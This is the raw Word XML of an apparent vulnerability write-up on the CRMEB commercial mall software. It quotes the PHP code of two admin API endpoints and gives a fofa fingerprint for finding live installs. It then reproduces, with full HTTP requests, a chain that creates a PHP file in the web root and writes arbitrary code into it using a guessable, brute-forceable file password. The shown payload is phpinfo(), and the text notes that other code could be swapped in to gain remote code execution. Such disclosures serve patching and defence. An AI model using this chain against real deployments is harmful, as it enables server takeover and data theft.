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Lines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>Zhongbang Technology CRMEB Mall commercial version of any file written to getshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="u6564f297"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>源码地址：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://gitee.com/ZhongBangKeJi/CRMEB"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https://gitee.com/ZhongBangKeJi/CRMEB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0"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="u4a66817c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>源码归属：众邦科技</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="u1cc6efe7"/>
      <w:bookmarkStart w:id="3" w:name="u737724b0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4300855" cy="1043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1067" cy="10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bookmarkStart w:id="4" w:name="ua05054c4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4300855" cy="1901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1067" cy="19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bookmarkEnd w:id="3"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="u340411c1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>公司官网：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.crmeb.com/"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https://www.crmeb.com/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5"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="u83298ec9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>源码使用量 有12260个IP</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="ue03dbbbf"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fofa：icon_hash="-847565074"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="uc42b4257"/>
      <w:bookmarkStart w:id="9" w:name="uef0e3802"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="3404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90934" cy="45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9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="Kj0pJ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>代码审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>This position</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="Times New Roman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2895" cy="2332990"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1397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>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="u72af6221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Interface: /adminapi/system/crud processing code is as follows</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11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2" w:name="TCtFw"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>public function save(SystemCrudDataService $service, $id = 0)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$data = $this-&gt;request-&gt;postMore([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['pid', 0],//上级菜单id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['menuName', ''],//菜单名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['tableName', ''],//表名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['modelName', ''],//模块名称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['tableComment', ''],//表备注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['tableField', []],//表字段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['tableIndex', []],//索引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['filePath', []],//生成文件位置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['isTable', 0],//是否生成表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['deleteField', []],//删除的表字段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]);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$fromField = $searchField = $hasOneField = $columnField = $tableIndex = [];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$dictionaryids = array_column($data['tableField'], 'dictionary_id');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($dictionaryids)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$dictionaryList = $service-&gt;getColumn([['id', 'in', $dictionaryids]], 'value', 'id');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foreach ($dictionaryList as &amp;$value)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$value = is_string($value) ? json_decode($value, true) : $value;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 else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$dictionaryList = [];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foreach ($data['tableField'] as $item)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//判断字段长度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(in_array($item['field_type'], [FormTypeEnum::DATE_TIME, 'timestamp', 'time', 'date', 'year']) &amp;&amp; $item['limit'] &gt; 6)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return app('json')-&gt;fail('字段' . $item['field'] . '长度不能大于6');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($item['field_type'] == 'enum' &amp;&amp; !is_array($item['limit']))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return app('json')-&gt;fail('数据类型为枚举时,长度为数组类型');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//收集列表展示数据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($item['is_table'] &amp;&amp; !in_array($item['field_type'], ['primaryKey', 'addSoftDelete']))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if (isset($item['primaryKey']) &amp;&amp; !$item['primaryKey'])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$columnField[] =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'field' =&gt; $item['field'],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'name' =&gt; $item['table_name'] ?: $item['comment'],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    'type' =&gt; $item['from_type'],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$name = $item['table_name'] ?: $item['comment'];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$option = $item['options'] ?? (isset($item['dictionary_id']) ? ($dictionaryList[$item['dictionary_id']] ?? []) : []);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//收集表单展示数据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($item['from_type'])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if (!$name)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return app('json')-&gt;fail(500048, [], ['field' =&gt; $item['field']]);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if (!$option &amp;&amp; in_array($item['from_type'], [FormTypeEnum::RADIO, FormTypeEnum::SELECT]))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return app('json')-&gt;fail('表单类型为radio或select时,options字段不能为空');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$fromField[] =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'field' =&gt; $item['field'],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'type' =&gt; $item['from_type'],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'name' =&gt; $name,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'required' =&gt; $item['required'],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'option' =&gt; $option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//搜索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(!empty($item['search']))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$searchField[] =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'field' =&gt; $item['field'],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'type' =&gt; $item['from_type'],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'name' =&gt; $name,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'search' =&gt; $item['search'],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'options' =&gt; $option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//关联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(!empty($item['hasOne']))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$hasOneField[] = [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'field' =&gt; $item['field'],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'hasOne' =&gt; $item['hasOne'] ?? '',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    'name' =&gt; $name,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//索引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(!empty($item['index']))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$tableIndex[] = $item['field'];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(!$fromField)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app('json')-&gt;fail(500046);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(!$columnField)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app('json')-&gt;fail(500047);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$data['fromField'] = $fromField;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$data['tableIndex'] = $tableIndex;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$data['columnField'] = $columnField;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$data['searchField'] = $searchField;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$data['hasOneField'] = $hasOneField;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(!$data['tableName'])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app('json')-&gt;fail(500042);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$this-&gt;services-&gt;createCrud($id, $data);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return app('json')-&gt;success(500043);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2"/>
    <w:p>
      <w:pPr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13" w:name="u230da460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There is no filter or suffix check on the path of the incoming parameters, resulting in the creation of files with any suffix in any path. Therefore, you can create a php file in the root directory of the website, but the content will have default code and then modify the content with the following interface (write any content).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pP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Written to the file of the interface/adminapi/system/crud/save_file: id handling code is as follows</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13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4" w:name="GlgBu"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>public function savefile(Request $request, SystemFileServices $service, $id)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$comment = $request-&gt;param('comment');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$filepath = $request-&gt;param('filepath');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$pwd = $request-&gt;param('pwd');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($pwd == '')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app('json')-&gt;fail('请输入文件管理密码');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(config('filesystem.password') != $pwd)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app('json')-&gt;fail('文件管理密码错误');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(empty($filepath) || !$id)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app('json')-&gt;fail(410087);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$crudInfo = $this-&gt;services-&gt;get($id, ['make_path']);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(!$crudInfo)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app('json')-&gt;fail('修改的CRUD文件不存在');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$makeFilepath = '';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foreach ($crudInfo-&gt;make_path as $key =&gt; $item)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$path = $item;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(in_array($key, ['pages', 'router', 'api']))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$item = Make::adminTemplatePath() . $item;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 else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$item = app()-&gt;getRootPath() . $item;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if ($filepath == $path)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$makeFilepath = $item;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    break;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(!$makeFilepath || !in_array($filepath, $crudInfo-&gt;make_path))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app('json')-&gt;fail('您没有权限修改此文件');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$res = $service-&gt;savefile($makeFilepath, $comment);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if ($res)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app('json')-&gt;success(100000);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 else {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    return app('json')-&gt;fail(100006);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    }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 xml:space="preserve">    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4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/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15" w:name="U8QvS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As you can see, there is also no filter that allows anything to be written to a file in any path as long as you know that the password config('filesystem.password') can burst because there is no limit on the number of times the password is entered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">The combination of the two interfaces can write arbitrary code resulting in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="u02f48420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First, call the following interface and fill in the path public\\Aa.php in the controller. This will create Aa.php in the root directory of the program</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16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17" w:name="UOzCS"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /adminapi/system/crud HTTP/1.1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Host: 192.168.242.142:89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Content-Length: 919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Accept: application/json, text/plain, */*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Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjc5NTcwNywibmJmIjoxNzA2Nzk1NzA3LCJleHAiOjE3MDkzODc3MDcsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.UXGhi5sYhA4tNyLX1CWza_qjJKkR8jMaKZ7CwdeBpU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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36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Content-Type: application/json;charset=UTF-8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Origin: http://192.168.242.142:89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Referer: http://192.168.242.142:89/admin/system/code_generation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Accept-Encoding: gzip, deflate, br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Accept-Language: zh-CN,zh;q=0.9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Cookie: cb_lang=zh-cn; PHPSESSID=3c31ae0511c0770e81da16eb38aa551a; WS_ADMIN_URL=ws://192.168.242.142:89/notice; WS_CHAT_URL=ws://192.168.242.142:89/msg; uuid=1; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjc5NTcwNywibmJmIjoxNzA2Nzk1NzA3LCJleHAiOjE3MDkzODc3MDcsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.UXGhi5sYhA4tNyLX1CWza_qjJKkR8jMaKZ7CwdeBpUY; expires_time=1709387707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Connection: close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{"pid":7,"tableName":"aa","modelName":"aa","isTable":1,"menuName":"aa","filePath":{"controller":"public\\Aa.php","model":"app\\model\\crud\\Aa.php","dao":"app\\dao\\crud\\AaDao.php","route":"app\\adminapi\\route\\crud\\aa.php","service":"app\\services\\crud\\AaServices.php","validate":"app\\adminapi\\validate\\crud\\AaValidate.php","router":"router\\modules\\crud\\aa.js","api":"api\\crud\\aa.js","pages":"pages\\crud\\aa\\index.vue"},"tableField":[{"field":"id","field_type":"int","default":"","comment":"自增ID","required":false,"is_table":true,"table_name":"ID","limit":"15","primaryKey":1,"from_type":""},{"field":"aa","field_type":"varchar","default":"aa","default_type":"1","comment":"aa","required":true,"is_table":true,"table_name":"aa","limit":200,"primaryKey":0,"from_type":"dateTime","search":"=","dictionary_id":0,"hasOne":["agent_level","name"],"index":true}],"deleteField":[]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17"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="ue3631efa"/>
      <w:bookmarkStart w:id="19" w:name="ufb8aa0e9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="24999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6134" cy="32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bookmarkEnd w:id="19"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="ua36cf6cd"/>
      <w:bookmarkStart w:id="21" w:name="uebcd93a0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Check that the directory was created successfully and some code is filled in automatically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5553710" cy="2682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134" cy="26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End w:id="21"/>
    <w:p>
      <w:pPr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22" w:name="ud508105a"/>
      <w:bookmarkStart w:id="23" w:name="uc4eb775b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Click again to see the code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="285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5866" cy="4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3"/>
    <w:p>
      <w:pPr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24" w:name="u062bfa69"/>
      <w:bookmarkStart w:id="25" w:name="u4857af68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Call the following packet here for 123456 (which can be exploded) if the file management password is known</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="17113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5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24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</w:pPr>
      <w:bookmarkStart w:id="26" w:name="m2b75"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /adminapi/system/crud/save_file/5 HTTP/1.1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Host: 192.168.242.142:89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Content-Length: 78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Accept: application/json, text/plain, */*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Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjc5NTcwNywibmJmIjoxNzA2Nzk1NzA3LCJleHAiOjE3MDkzODc3MDcsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.UXGhi5sYhA4tNyLX1CWza_qjJKkR8jMaKZ7CwdeBpUY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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36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Content-Type: application/json;charset=UTF-8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Origin: http://192.168.242.142:89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Referer: http://192.168.242.142:89/admin/system/code_generation_list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Accept-Encoding: gzip, deflate, br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Accept-Language: zh-CN,zh;q=0.9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Cookie: cb_lang=zh-cn; PHPSESSID=3c31ae0511c0770e81da16eb38aa551a; WS_ADMIN_URL=ws://192.168.242.142:89/notice; WS_CHAT_URL=ws://192.168.242.142:89/msg; uuid=1; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjc5NTcwNywibmJmIjoxNzA2Nzk1NzA3LCJleHAiOjE3MDkzODc3MDcsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.UXGhi5sYhA4tNyLX1CWza_qjJKkR8jMaKZ7CwdeBpUY; expires_time=1709387707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Connection: close</w:t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br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{"filepath":"public\\Aa.php","comment":"&lt;?php\nphpinfo();\n?&gt;","pwd":"123456"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="u65f0e82c"/>
      <w:bookmarkStart w:id="28" w:name="u93af3851"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000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43334" cy="36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8"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="u23026720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Content written successfully</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="u425b6bd8"/>
      <w:bookmarkStart w:id="31" w:name="u3eaff25d"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2404110" cy="9340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9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31"/>
    <w:p>
      <w:pPr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32" w:name="uab014ae5"/>
      <w:bookmarkStart w:id="33" w:name="u1609681e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 xml:space="preserve">Try to access </w:t>
      </w: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fldChar w:fldCharType="begin"/>
      </w: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instrText xml:space="preserve"> HYPERLINK "http://192.168.242.142:89/Aa.php" </w:instrText>
      </w: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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://192.168.242.142:89/Aa.php</w:t>
      </w:r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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="34461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68934" cy="57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3"/>
    <w:p>
      <w:pPr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34" w:name="u2134483e"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is just phpinfo written for harmlessness verification can be written to other things for RCE and it's in the root directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:bookmarkEnd w:id="34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overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
  </w:compat>
  <w:docVars>
    <w:docVar w:name="commondata" w:val="eyJoZGlkIjoiY2NhYzZhYjljMzQ3ZDY2YWJjZjJmM2RlNDZjMzhkZWIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="08294FEC"/>
    <w:rsid w:val="3FEF2503"/>
    <w:rsid w:val="54AD21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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="caption"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine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autoRedefine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autoRedefine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autoRedefine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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="16">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="14"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="2"/>
    <w:autoRedefine/>
    <w:qFormat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autoRedefine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autoRedefine/>
    <w:qFormat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autoRedefine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autoRedefine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autoRedefine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autoRedefine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13</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <Application>WPS Office_12.1.0.16250_F1E327BC-269C-435d-A152-05C5408002CA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2024-02-01T16:00:00Z</dcterms:created>
  <dc:creator>22938</dc:creator>
  <cp:lastModifiedBy>Echo丶</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-07T13:42:09Z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A4D71DE405534BACAE280CFECAD85F7D_12</vt:lpwstr>
  </property>
</Properties>
</file>